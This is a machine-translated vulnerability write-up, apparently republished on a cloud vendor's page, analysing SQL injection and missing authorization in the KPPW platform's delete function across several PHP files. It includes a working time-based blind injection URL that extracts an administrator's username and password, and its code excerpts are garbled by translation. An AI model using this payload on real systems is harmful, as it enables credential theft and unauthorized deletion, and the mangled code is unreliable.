KPPW Latest Version SQL injection vulnerability 4 (multiple injection and unauthorized analysis due to the same problem)

Source: Internet
Author: User

KPPW Latest Version SQL injection vulnerability 4 (multiple injection and unauthorized analysis due to the same problem)

KPPW latest SQL injection vulnerability 4 (multiple injection and unauthorized injection due to the same problem)


File/control/user/account_report.php

$ ObjReportT = keke_table_class: get_instance ('witkey _ Report'); if (isset ($ action) {switch ($ action) {case 'mulitdel ': if ($ ckb) {$ objTaskT-> del ('Task _ id', $ ckb); kekezu: show_msg ('deleted successfully', $ strUrl, NULL, NULL, 'OK ');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break;



In $ objTaskT-> del ('Task _ id', $ ckb);, $ ckb enters the del Function

Follow del function, file/lib/inc/keke_table_class.php

function del($pk, $val, $url = null) {if (! $val) {return false;}if (is_array ( $val ) && ! empty ( $val )) {$ids = implode ( ',', $val );$this->_table_obj->setWhere ( " $pk in ($ids)" );} elseif ($val) {$this->_table_obj->setWhere ( "$pk = " . $val );}$del_query = "del_" . $this->_pre . $this->_table_name;return $this->_table_obj->$del_query ();}



We can see that the val is both a ckb variable.

When val is not empty and it is not a number, it directly enters the where Condition Statement. Do not use quotation marks to protect it, resulting in SQL injection.

Here is a bug: The del function is a function in the/lib/inc/keke_table_class.php file, but here the/lib/inc/keke_table_class.php file is instantiated as: $ objReportT = keke_table_class :: get_instance ('witkey _ Report'); while $ objTaskT has no initialization object, so the del function cannot be triggered.



There is also an issue of consent in the file/control/user/account_rights.php



Because the del function here is a global function in the file/lib/inc/keke_table_class.php.

Called in many places:

 



The background trigger does not work here (it is said that the vulnerability of the day after tomorrow is really nobody cares ...)

There are more than 20 triggers and files at the front-end.

Partially filtered

There are more to start.

/control/user/message_detail.php/control/user/message_notice.php/control/user/message_private.php/control/user/shop_caselist.php/control/user/transaction_released.php/control/user/transaction_service.php





Here/control/user/transaction_service.php is used as an example:

$ StrModelName = $ kekezu-> _ model_list [$ intModelId] ['model _ Code']; $ arrStatus = call_user_func (array ($ strModelName. '_ shop_class', 'Get _'. $ strModelName. '_ status'); $ objServiceT = keke_table_class: get_instance ('witkey _ Service'); if (isset ($ action) {switch ($ action) {case 'mulitdel ': if ($ ckb) {$ objServiceT-> del ('service _ id', $ ckb); kekezu: show_msg ('deleted successfully ', $ strUrl, NULL, NULL, 'OK');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break;



Agree to inject



In phase II, when deleting various types of data, the data is only deleted based on the id, and user attributes are not determined, resulting in unauthorized operations.

Delete content under any user permission

Here, you can delete all modules and data created by the Administrator.

SQL Injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=service&action=mulitDel&ckb=1161 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)



Check the SQL Execution result:
 



This will be returned after a delay of 5 seconds
 



The first character of UserName + password is.

The cbk here is the service_id of the service module.

Cbk = 1161 is a module created by the admin user. It can also be deleted, resulting in unauthorized operations.

Solution:

Use intval or single quotation marks for protection.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.